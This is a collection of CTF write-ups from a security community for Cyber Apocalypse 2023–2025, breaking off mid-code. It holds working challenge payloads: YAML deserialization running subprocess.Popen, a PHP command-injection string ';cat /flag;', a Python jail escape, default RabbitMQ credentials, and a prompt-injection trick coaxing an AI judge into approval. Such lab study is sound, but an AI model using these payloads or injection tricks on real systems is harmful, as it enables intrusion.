/cyber_apocalypse_2023/forensics/Extraterrestrialpersistence.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Extraterrestrial persistence Writeup
4 | desc: Check out our writeup for Extraterrestrial persistence for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Extraterrestrial persistence
10 | tags: "forensics, twh"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - A bash script is given which installs a systemd service
21 | - one of the lines contains an `echo` command :
22 |
23 | ```
24 | echo -e "W1VuaXRdCkRlc2NyaXB0aW9uPUhUQnt0aDNzM180bDEzblNfNHIzX3MwMDAwMF9iNHMxY30KQWZ0ZXI9bmV0d29yay50YXJnZXQgbmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KVHlwZT1vbmVzaG90ClJlbWFpbkFmdGVyRXhpdD15ZXMKCkV4ZWNTdGFydD0vdXNyL2xvY2FsL2Jpbi9zZXJ2aWNlCkV4ZWNTdG9wPS91c3IvbG9jYWwvYmluL3NlcnZpY2UKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldA=="|base64 --decode > /usr/lib/systemd/system/service.service
25 | ```
26 |
27 | - Decoding the base64 string gives us the flag
28 |
29 | ```
30 | HTB{th3s3_4l13nS_4r3_s00000_b4s1c}
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/Packetcyclone.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Packet cyclone Writeup
4 | desc: Check out our writeup for Packet cyclone for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Packet cyclone
10 | tags: "forensics, twh, evtx, chainsaw"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - We are given Windows EVTX files and sigma rules for detecting exfiltration using `rclone`
21 | - To scan these EVTX files we can use `chainsaw` which supports sigma rules
22 |
23 | ```
24 | chainsaw hunt -s sigma_rules -m sigma-event-logs-all.yml Logs
25 | ```
26 |
27 | - Two detection are shown
28 | - First one contains credentials of `mega.nz`
29 | 
30 |
31 | - Second contains file paths
32 |
33 |
34 | 
35 |
36 | - Here are the correct answers based on information given in these two detection :
37 |
38 |
39 | 
40 |
41 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/PlaintextTleasure.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Plaintext Tleasure Writeup
4 | desc: Check out our writeup for Plaintext Tleasure for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Plaintext Tleasure
10 | tags: "forensics, twh"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - Simple challenge, just go through HTTP requests and flag is sent in a POST request
20 |
21 |
22 | 
23 |
24 | HTB{th3s3_4l13ns_st1ll_us3_HTTP}
25 |
26 |
27 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/Roten.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Roten Writeup
4 | desc: Check out our writeup for Roten for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Roten
10 | tags: "forensics, twh, pcap"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - A PCAP file is given again
21 | - Apply a filter to view only POST requests :
22 |
23 | ```
24 | http.request.method=="POST"
25 | ```
26 |
27 | - In one of the requests we can see a PHP file by the name `galacticmap.php` is uploaded
28 |
29 |
30 | 
31 |
32 | - It is a obfuscated PHP file, in its last line of code `eval` function is executed
33 | - To de-obfuscate I commented out the eval and added an `echo`
34 |
35 |
36 | 
37 |
38 | - After running this PHP file we can get the flag :
39 |
40 |
41 | 
42 |
43 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/hardware.md:
--------------------------------------------------------------------------------
1 | # hardware
2 |
3 | ## Timed Transmission
4 | > Solved by: WarlordSam
5 |
6 | Challenge description
7 |
8 | 
9 |
10 |
11 | This hardware challenge is pretty straight-forward. We are given a *.sal* file which has captured data.
12 |
13 | We can use Logic Analyzer (https://www.saleae.com/downloads/) to view this .sal file. The flag is printed as banner made up of 5 Message fragments .
14 |
15 |
16 | 
17 |
18 | ----------
19 |
20 | ## Critical Flight
21 | > Solved by: warlordsam
22 |
23 | Challenge description
24 |
25 | 
26 |
27 |
28 | Similar to Timed Transmission, the flag is directly visible to us when we open the .zip folder in GerbView Software (https://www.gerbview.com/download.html).
29 |
30 | First part of the Flag is visible directly when all the layers of the PCB board are set to be visible.
31 |
32 | Selecting and unselecting, layer by layer; we can get the rest part of the flag too.
33 |
34 | 
35 |
36 |
37 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/hardware/CriticalFlight.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Critical Flight Writeup
4 | desc: Check out our writeup for Critical Flight for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: hardware
9 | challenge: Critical Flight
10 | tags: "hardware, warlordsam, gerbview, pcb"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: warlordsam
17 |
18 | Challenge description
19 |
20 | 
21 |
22 |
23 | Similar to Timed Transmission, the flag is directly visible to us when we open the .zip folder in GerbView Software (https://www.gerbview.com/download.html).
24 |
25 | First part of the Flag is visible directly when all the layers of the PCB board are set to be visible.
26 |
27 | Selecting and unselecting, layer by layer; we can get the rest part of the flag too.
28 |
29 | 
30 |
31 |
32 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/hardware/TimedTransmission.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Timed Transmission Writeup
4 | desc: Check out our writeup for Timed Transmission for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: hardware
9 | challenge: Timed Transmission
10 | tags: "hardware, warlordsam, salea"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: WarlordSam
17 |
18 | Challenge description
19 |
20 | 
21 |
22 |
23 | This hardware challenge is pretty straight-forward. We are given a *.sal* file which has captured data.
24 |
25 | We can use Logic Analyzer (https://www.saleae.com/downloads/) to view this .sal file. The flag is printed as banner made up of 5 Message fragments .
26 |
27 |
28 | 
29 |
30 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2023
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/misc/Hijack.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Hijack Writeup
4 | desc: Check out our writeup for Hijack for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: misc
9 | challenge: Hijack
10 | tags: "misc, starry"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Starry-Lord
17 |
18 |
19 | 
20 |
21 |
22 | Connect with nc to the docker instance, then create a config and decode the base 64. We can see it gives back YAML syntax so we can try to inject commands with subprocess.Popen:
23 |
24 | After base64 encoding it, and using the “Load config” option, This worked!
25 |
26 | !!python/object/apply:subprocess.Popen
27 | - ls
28 |
29 | I had to dig a little more to find how to give arguments to the command:
30 |
31 |
32 | !!python/object/apply:subprocess.Popen
33 | - !!python/tuple
34 | - ls
35 | - -la
36 |
37 |
38 | And solved:
39 |
40 | ```
41 | !!python/object/apply:subprocess.Popen
42 | - !!python/tuple
43 | - cat
44 | - flag.txt
45 | ```
46 |
47 | 
48 |
49 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/misc/Persistence.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Persistence Writeup
4 | desc: Check out our writeup for Persistence for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: misc
9 | challenge: Persistence
10 | tags: "misc, legend, scripting"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Legend
17 |
18 | Challenge description
19 |
20 |
21 | > Thousands of years ago, sending a GET request to /flag would grant immense power and wisdom. Now it's broken and usually returns random data, but keep trying, and you might get lucky... Legends say it works once every 1000 tries.
22 |
23 | In this challenge we are given `IP` along with `Port Number` to connect to the challenge and retrieve the flag using the `GET` request.
24 |
25 | Initially checking the URL it gave something gibberish.
26 |
27 | 
28 |
29 |
30 | The hint of the challenge was that the `/flag` works once in 1000 tries. So I made a loop to do the same.
31 |
32 |
33 | for i in `seq 1 1000`; do curl -s http://68.183.45.143:31981/flag | grep -i "HTB" ; done
34 |
35 | And after running for sometime it gave the flag.
36 |
37 | 
38 |
39 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/ml.md:
--------------------------------------------------------------------------------
1 | # ml
2 |
3 | ## Reconfiguration
4 | > Solved by : Bobbysox
5 |
6 | Challenge description
7 |
8 |
9 | > Reconfiguration
10 | > As Pandora set out on her quest to find the ancient alien relic, she knew that the journey would be treacherous. The desert was vast and unforgiving, and the harsh conditions would put her cyborg body to the test. Pandora started by collecting data about the temperature and humidity levels in the desert. She used a scatter plot in an Orange Workspace file to visualize this data and identified the areas where the temperature was highest and the humidity was lowest. Using this information, she reconfigured her sensors to better withstand the extreme heat and conserve water. But, a second look at the data revealed something otherwordly, it seems that the relic's presence beneath the surface has scarred the land in a very peculiar way, can you see it?
11 |
12 | We are provided with two files for this. An OWS file, and a .CSV file. After some googling I found out that .ows files can be run in a program called “Orange”
13 |
14 |
15 | 
16 |
17 |
18 | From here it was honestly just a matter of toying with it. The csv file is a data table, so I chose the data table option and linked it to the scatter plot. This ultimately revealed the flag.
19 |
20 | 
21 |
22 |
23 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/pwn/InitialiseConnection.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Initialise Connection Writeup
4 | desc: Check out our writeup for Initialise Connection for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: pwn
9 | challenge: Initialise Connection
10 | tags: "pwn, legend"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Legend
17 |
18 | Challenge description
19 |
20 |
21 | > In order to proceed, we need to start with the basics. Start an instance, connect to it via $ nc e.g. nc 127.0.0.1 1337 and send "1" to get the flag.
22 |
23 | This challenge is basically how to connect to `netcat` and the instructions are given in the description itself. I just followed it and got the flag.
24 |
25 | 
26 |
27 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/re/NeedleinaHaystack.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Needle in a Haystack Writeup
4 | desc: Check out our writeup for Needle in a Haystack for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: re
9 | challenge: Needle in a Haystack
10 | tags: "re, legend"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Legend
17 |
18 | Challenge description
19 |
20 |
21 | > You've obtained an ancient alien Datasphere, containing categorized and sorted recordings of every word in the forgotten intergalactic common language. Hidden within it is the password to a tomb, but the sphere has been worn with age and the search function no longer works, only playing random recordings. You don't have time to search through every recording - can you crack it open and extract the answer?
22 |
23 | In this challenge we are given a ELF 64-bit executable file.
24 |
25 | 
26 |
27 | 
28 |
29 |
30 | The challenge hint said that the password is `hidden within` so first thing I did was run the `strings` command to check if something is there and found the flag.
31 |
32 | 
33 |
34 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2024
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Crypto](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Hardware](hardware.md)
10 | * [Misc](misc.md)
11 | * [Reverse Engineering](re.md)
12 | * [Web](web.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/forensics/AnUnusualsighting.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | An Unusual sighting Writeup
4 | desc: Check out our writeup for An Unusual sighting for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: forensics
9 | challenge: An Unusual sighting
10 | tags: "forensics, starry"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | This challenge came with 2 interesting files which allowed to answer the questions asked at the docker url.
19 |
20 | 
21 |
22 |
23 | We can see a connection at around 4:00 AM which is not the usual legitimate users’ working hours.
24 |
25 |
26 | 
27 |
28 |
29 | ```
30 | HTB{B3sT_0f_luck_1n_th3_Fr4y!!}
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/forensics/ItHasBegun.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | It Has Begun Writeup
4 | desc: Check out our writeup for It Has Begun for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: forensics
9 | challenge: It Has Begun
10 | tags: "forensics, starry"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | We only get a script.sh for this challenge
19 |
20 | 
21 |
22 |
23 | Running this file will actually kill your current user session authentication. Upon closer examination of what it does we can see that the host name for the ssh key looks awfully suspicious, and that a base64 string is being executed in bash at the end.
24 |
25 | Reverse 1 and decode 2 for the flag:
26 |
27 | ```
28 | HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/forensics/Urgent.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Urgent Writeup
4 | desc: Check out our writeup for Urgent for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: forensics
9 | challenge: Urgent
10 | tags: "forensics, starry"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 |
19 | 
20 |
21 |
22 | This time it comes as an email file, along with an attachment called onlineform.js which is almost fully urlencoded:
23 |
24 |
25 | 
26 |
27 | 
28 |
29 |
30 | ```
31 | HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT}
32 | ```
33 |
34 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/hardware.md:
--------------------------------------------------------------------------------
1 | # hardware
2 |
3 | ## BunnyPass
4 | > Solved by : Starry-lord
5 |
6 | In this challenge we only have a docker instance, here is what we see:
7 |
8 | 
9 |
10 | > **RabbitMQ** is a reliable and mature messaging and streaming broker
11 | > -- [https://www.rabbitmq.com](https://www.rabbitmq.com/)
12 |
13 | When we research about RabbitMQ online we can find interesting details, such as the the default password for an installation which is :
14 | `guest:guest` .
15 |
16 |
17 | 
18 |
19 |
20 | We can see an admin panel, which allows to edit user rights and access to any ressource, and also shows the guest user has the administrator role, for some reason.
21 |
22 |
23 | 
24 |
25 |
26 | We then notice a few Messages are ready so we can click to see whats going on in `quality_control`, `production_logs`, `maintenance_logs`, `factory_idle`, etc. The flag is in `factory_idle`.
27 |
28 |
29 | 
30 |
31 | 
32 |
33 |
34 | ```
35 | HTB{th3_hunt3d_b3c0m3s_th3_hunt3r}
36 | ```
37 |
38 | ----------
39 |
40 | ## Maze
41 | > Solved by : thewhiteh4t
42 |
43 | - Just explore challenge files
44 |
45 | 
46 |
47 | - Read Factory.pdf
48 |
49 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/hardware/Maze.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Maze Writeup
4 | desc: Check out our writeup for Maze for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: hardware
9 | challenge: Maze
10 | tags: "hardware, twh"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | - Just explore challenge files
19 |
20 | 
21 |
22 | - Read Factory.pdf
23 |
24 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2024
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/misc/Unbreakable.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Unbreakable Writeup
4 | desc: Check out our writeup for Unbreakable for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: misc
9 | challenge: Unbreakable
10 | tags: "misc, twh, python, jail, escape"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | - This is a python jail challenge, at first it looks difficult because even built-ins cannot be used but then we realized two things :
19 | - it is using `eval` instead of `exec`
20 | - open() is not blocked
21 | - Payload :
22 |
23 | ```
24 | print(open('flag.txt').read())
25 | ```
26 |
27 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/re/Boxcutter.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Boxcutter Writeup
4 | desc: Check out our writeup for Boxcutter for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: re
9 | challenge: Boxcutter
10 | tags: "re, twh, gdb"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - Very simple challenge, all we had to do is load the binary in GDB and go few instructions forward and we get the flag, free points.
20 |
21 |
22 | 
23 |
24 |
25 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/re/LootStash.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | LootStash Writeup
4 | desc: Check out our writeup for LootStash for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: re
9 | challenge: LootStash
10 | tags: "re, starry, ghidra"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-lord
17 |
18 | Since I don’t really dive into reversing usually, I decided to try my luck with tools like ghidra for the occasion.
19 |
20 | 
21 |
22 |
23 | We can see the binary seems to output a random string, searched into a list then closes the program.
24 |
25 | Immediately curious to see what was the list, I looked for it into ghidra and eventually cycling through the functions, you can find it.
26 |
27 |
28 | 
29 |
30 |
31 | Then curiosity made the rest possible, since i wanted to find some sort of pattern or something that would stand out:
32 |
33 | 
34 |
35 |
36 | After all of this, realised you could’ve actually just used strings:
37 |
38 |
39 | 
40 |
41 |
42 | ```
43 | HTB{n33dl3_1n_a_l00t_stack}
44 | ```
45 |
46 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/re/Packed.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Packed Writeup
4 | desc: Check out our writeup for Packed for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: re
9 | challenge: Packed
10 | tags: "re, ava, upx"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > solved by : avantika(@iamavu)
17 |
18 | we are given a binary, called packed i.e this has been obfuscated/packed by the dev, which hinders our exploitation and reversing as it’s very hard to understand what’s going on
19 |
20 | we use checksec command provided by pwntools to check which packer they have used
21 | `pwn checksec packed`
22 |
23 |
24 | 
25 |
26 |
27 | as we can observe it has been packed with UPX, quite the popular packer, now we just need to unpack it to see all the functions properly, so we can dissect it using the following command
28 | `upx -d -o unpacked packed`
29 | we would now have binary called unpacked in our current directory, which will be unpacked and not obfuscated
30 | fire up your ghidra, let’s have a look at the functions, the `entered` function has our flag in plaintext, so pretty much easy win
31 | `HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}`
32 | pwned!
33 |
34 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/web/FlagCommand.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Flag Command Writeup
4 | desc: Check out our writeup for Flag Command for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: web
9 | challenge: Flag Command
10 | tags: "web, legend, api"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 | Challenge description:
19 |
20 | ```
21 | Embark on the "Dimensional Escape Quest" where you wake up in a mysterious forest maze that's not quite of this world. Navigate singing squirrels, mischievous nymphs, and grumpy wizards in a whimsical labyrinth that may lead to otherworldly surprises. Will you conquer the enchanted maze or find yourself lost in a different dimension of magical challenges? The journey unfolds in this mystical escape!
22 | ```
23 |
24 | In this challenge the website is a game. After interacting with for a few minutes saw that it is running with `API` mostly.
25 | In burp I saw there was options which showed all the game command which can be used.
26 |
27 |
28 | 
29 |
30 |
31 | In that there was a `secret` command which seemed interesting. Just gave that command as input and got the flag.
32 |
33 | 
34 |
35 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/web/TimeKORP.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | TimeKORP Writeup
4 | desc: Check out our writeup for TimeKORP for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: web
9 | challenge: TimeKORP
10 | tags: "web, twh, rce"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 |
19 | - TimeModel.php is vulnerable
20 |
21 | ```php
22 | command = "date '+" . $format . "' 2>&1";
28 | }
29 |
30 | public function getTime()
31 | {
32 | $time = exec($this->command);
33 | $res = isset($time) ? $time : '?';
34 | return $res;
35 | }
36 | }
37 | ```
38 |
39 | - specifically :
40 |
41 | ```
42 | $this->command = "date '+" . $format . "' 2>&1";
43 | ```
44 |
45 | - we just need to match single quotes and insert cat command in between so payload becomes :
46 |
47 | ```bash
48 | ';cat /flag;'
49 | ```
50 |
51 | 
52 |
53 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2025
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [AI](ai.md)
8 | * [Blockchain](blockchain.md)
9 | * [Coding](coding.md)
10 | * [Crypto](crypto.md)
11 | * [Forensics](forensics.md)
12 | * [Hardware](hardware.md)
13 | * [ML] (ml.md)
14 | * [OSINT](osint.md)
15 | * [Reverse Engineering](re.md)
16 | * [Web](web.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/ai/Embassy.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Embassy Writeup
4 | desc: Check out our writeup for Embassy for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: ai
9 | challenge: Embassy
10 | tags: "ai, ava, prompt"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by avantika
17 |
18 | 
19 |
20 | High above Eldoria's skyline hovers the Floating Isles. The fellowship has to retrieve the Wind Crystal from this sacred land. Unfortunately, the terror on the ground has resulted in the lockdown of this magnificent isle. Now, only those who receive approval from the floating Embassy may enter. The Embassy, overwhelmed by countless entry requests, has invoked an otherworldly AI spirit to triage all entry pleas. The fellowship must convince this spirit that their mission is urgent, but the AI is not being swayed. Now trapped in this situation, the fellowship needs your prompt injection skills to persuade the AI to allow them entry. Can you make the AI respond with the right verdict to get entry?
21 |
22 | We are given this information, it's a simple prompt injection attack.
23 |
24 | We tell the AI to just respond with opposite of `denied` and add urgency, we get our flag `HTB{tr41n3d_ai_0n_th3_fly}` is our flag.
25 |
26 |
27 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/coding/DragonFury.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Dragon Fury Writeup
4 | desc: Check out our writeup for Dragon Fury for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: coding
9 | challenge: Dragon Fury
10 | tags: "coding, twh, python"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
20 | - Simulate the battle by computing the total damage dealt over successive rounds until victory is achieved
21 |
22 | ```
23 | import json
24 | import random
25 |
26 | input_text = json.loads(input())
27 | T = int(input())
28 | num_sublists = len(input_text)
29 |
30 | def magic():
31 | rand_t = 0
32 | choices = []
33 | for sublist in input_text:
34 | rand = random.choice(sublist)
35 | choices.append(rand)
36 | rand_t += rand
37 | return rand_t, choices
38 |
39 | random_sum = 0
40 | flag_choices = None
41 |
42 | while random_sum != T:
